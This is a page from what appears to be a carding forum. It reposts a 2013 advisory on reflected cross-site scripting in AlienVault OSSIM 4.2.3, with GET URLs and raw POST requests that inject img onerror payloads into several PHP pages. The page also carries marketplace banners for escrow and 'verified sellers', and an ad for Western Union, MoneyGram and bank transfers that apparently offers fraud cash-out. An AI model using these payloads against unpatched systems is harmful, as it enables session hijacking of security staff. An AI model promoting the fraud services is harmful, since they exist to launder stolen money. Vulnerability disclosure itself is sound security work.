We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 1 Vote(s) - 5 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
Alienvault OSSIM Cross Site Scripting

#1
Alienvault OSSIM versions prior to 4.3.0 suffer from multiple reflective cross site scripting vulnerabilities.

Code:
# Title: Alienvault OSSIM Open Source SIEM 4.2.3 Multiple Reflected XSS Vulnerabilities
        # Date: July 25, 2013
        # Author: xistence ( xistence[@]0x90[.]nl )
        # Vendor: AlienVault
        # Vendor URL: OSSIM, SIEM, Threat Management, Compliance Management | Alien Vault
        # Reported: June 24, 2013
        # Fix: Upgrade to version 4.3.0


        Timeline:
        ---------
        24 Jun 2013: Vulnerability Reported to AlienVault
        25 Jul 2013: Still no Vendor response.
        xx Jul 2013: Vendor has released version 4.3.0. Version 4.3.0 is not
        vulnerable to these vulnerability, probably fixed by vendor.
        25 Jul 2013: Public Disclosure


        Vendor Description:
        -------------------
        AlienVault's open source SIEM project, OSSIM, created in 2003, is the most
        widely used SIEM offering with over 195,000 downloads in 175 countries.

        OSSIM provides all of the features that a security professional needs from
        a SIEM offering event collection, normalization, and correlation.
        Established and launched by security engineers out of necessity, OSSIM was
        created with an understanding of the reality many security professionals
        face: a SIEM is useless without the basic security controls necessary for
        security visibility. OSSIM addresses this reality by providing the
        essential security capabilities built into a unified platform. Standing on
        the shoulders of the many proven open source security controls built
        into the platform, OSSIM continues to be the fastest way to make the first
        steps towards unified security visibility.

        AlienVault provides ongoing development for OSSIM because we believe that
        everyone should have access to sophisticated security technologies;
        this includes the researchers who need a platform for experimentation, and
        the unsung heroes who can't convince their companies that security is a
        problem.


        Vulnerability Details:
        ----------------------

        OSSIM 4.2.3 and lower is vulnerable to multiple reflected cross site
        scripting (XSS) vulnerabilities. The PHP code does seem to sanitize a lot of
        input to protect against XSS/SQLi/etc. such as disallowing <script> code
        tags. However, it's possible to inject <img src=a onerror=[javascriptcode]>
        to execute javascript code on the client browser. Below are the reflected
        XSS vulnerabilities.

        [ 0x01 - Reflected XSS GET ]

        https://
        <IP>/ossim/vulnmeter/index.php?withoutmenu=%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3E
        https://
        <IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu="><img%20src%3da%20onerror%3dalert('XSS')>
        https://
        <IP>/ossim/av_inventory/task_edit.php?section="><img%20src%3da%20onerror%3dalert('XSS')>
        https://
        <IP>/ossim/nfsen/rrdgraph.php?cmd=get-detailsgraph&profile=<img%20src%3da%20onerror%3dalert('XSS')>


        [ 0x02 - Reflected XSS POST request #1 ]

        POST /ossim/vulnmeter/simulate.php HTTP/1.1
        Host: <IP>
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)
        Gecko/20100101 Firefox/21.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Referer: https://
        <IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1
        Content-Length: 72
        Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah
        Connection: keep-alive
        Pragma: no-cache
        Cache-Control: no-cache

        hosts_alive=1&scan_locally=1&not_resolve=0&scan_server=<img%20src%3da%20onerror%3dalert('XSS')>&targets=blah


        [ 0x03 - Reflected XSS POST request #2 ]

        POST /ossim/vulnmeter/simulate.php HTTP/1.1
        Host: <IP>
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)
        Gecko/20100101 Firefox/21.0
        Accept: */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Referer: https://
        <IP>/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1
        Content-Length: 72
        Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah
        Connection: keep-alive
        Pragma: no-cache
        Cache-Control: no-cache

        hosts_alive=1&scan_locally=1&not_resolve=0&scan_server=Null&targets=blah<img%20src%3da%20onerror%3dalert('XSS')>
Reply
Paid adv. expire in 31 days
CLICK to buy Advertisement !

    Verified & Trusted WesternUnion / MoneyGram / Bank - Transferring -WorldWide [ MTCN in 3 hours ]




Forum Jump: